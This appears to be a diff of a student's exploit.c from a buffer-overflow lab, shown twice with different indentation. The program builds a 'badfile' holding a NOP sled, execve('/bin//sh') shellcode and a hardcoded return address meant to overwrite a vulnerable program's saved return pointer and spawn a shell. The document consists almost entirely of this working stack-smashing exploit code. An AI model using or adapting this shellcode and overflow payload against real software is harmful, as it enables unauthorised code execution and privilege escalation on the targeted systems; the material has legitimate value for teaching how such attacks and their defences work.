March 11, 2013 11:13
diff --git a/exploit.c b/exploit.c
 /* exploit.c  */

 /* A program that creates a file containing code for launching shell*/
 #include <stdlib.h>
 #include <stdio.h>
 #include <string.h>
 char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
 ;

 void main(int argc, char **argv)
 {
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */ 
    char mycode[20] =
 	/* first line: valid size of buf (12 bytes) */ 
 	"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
 	/* second line: skip past sfp (1 word) */
 	"\xff\xff\xff\xff"
 	/* third line: overwrite ret with beginning of shellcode */
 	/* note: stack for main() begins at ~0xbffff524 */
 	/* so buf starts at that minus 520 */
 	/* first 20 bytes are stack smasher */
 	/* then lots of NOPs */
 	/* put script at end so it falls through */ 
 	/* we'll jump somewhere about 200 lower than bffff524 */
 	/* try 0xbffff45c */
        "\x5c\xf4\xff\xbf";
 	/* note: write in little-endian */

    /* now put this at the beginning of badfile. */

    int i;
    int j;    

    for( i = 0; i < 20; i++ )
    {
        buffer[i]=mycode[i];
    }

    for( i,j=0; i < 20+strlen(shellcode); i++,j++ )
    {
        buffer[i]=shellcode[j];
    }

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
 }
	/* exploit.c */

	/* A program that creates a file containing code for launching shell*/
	#include <stdlib.h>
	#include <stdio.h>
	#include <string.h>
	char shellcode[]=
	"\x31\xc0" /* xorl %eax,%eax */
	"\x50" /* pushl %eax */
	"\x68""//sh" /* pushl $0x68732f2f */
	"\x68""/bin" /* pushl $0x6e69622f */
	"\x89\xe3" /* movl %esp,%ebx */
	"\x50" /* pushl %eax */
	"\x53" /* pushl %ebx */
	"\x89\xe1" /* movl %esp,%ecx */
	"\x99" /* cdql */
	"\xb0\x0b" /* movb $0x0b,%al */
	"\xcd\x80" /* int $0x80 */
	;

	void main(int argc, char **argv)
	{
	char buffer[517];
	FILE *badfile;

	/* Initialize buffer with 0x90 (NOP instruction) */
	memset(&buffer, 0x90, 517);

	/* You need to fill the buffer with appropriate contents here */
	char mycode[20] =
	/* first line: valid size of buf (12 bytes) */
	"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
	/* second line: skip past sfp (1 word) */
	"\xff\xff\xff\xff"
	/* third line: overwrite ret with beginning of shellcode */
	/* note: stack for main() begins at ~0xbffff524 */
	/* so buf starts at that minus 520 */
	/* first 20 bytes are stack smasher */
	/* then lots of NOPs */
	/* put script at end so it falls through */
	/* we'll jump somewhere about 200 lower than bffff524 */
	/* try 0xbffff45c */
	"\x5c\xf4\xff\xbf";
	/* note: write in little-endian */

	/* now put this at the beginning of badfile. */

	int i;
	int j;

	for( i = 0; i < 20; i++ )
	{
	buffer[i]=mycode[i];
	}

	for( i,j=0; i < 20+strlen(shellcode); i++,j++ )
	{
	buffer[i]=shellcode[j];
	}

	/* Save the contents to the file "badfile" */
	badfile = fopen("./badfile", "w");
	fwrite(buffer, 517, 1, badfile);
	fclose(badfile);
	}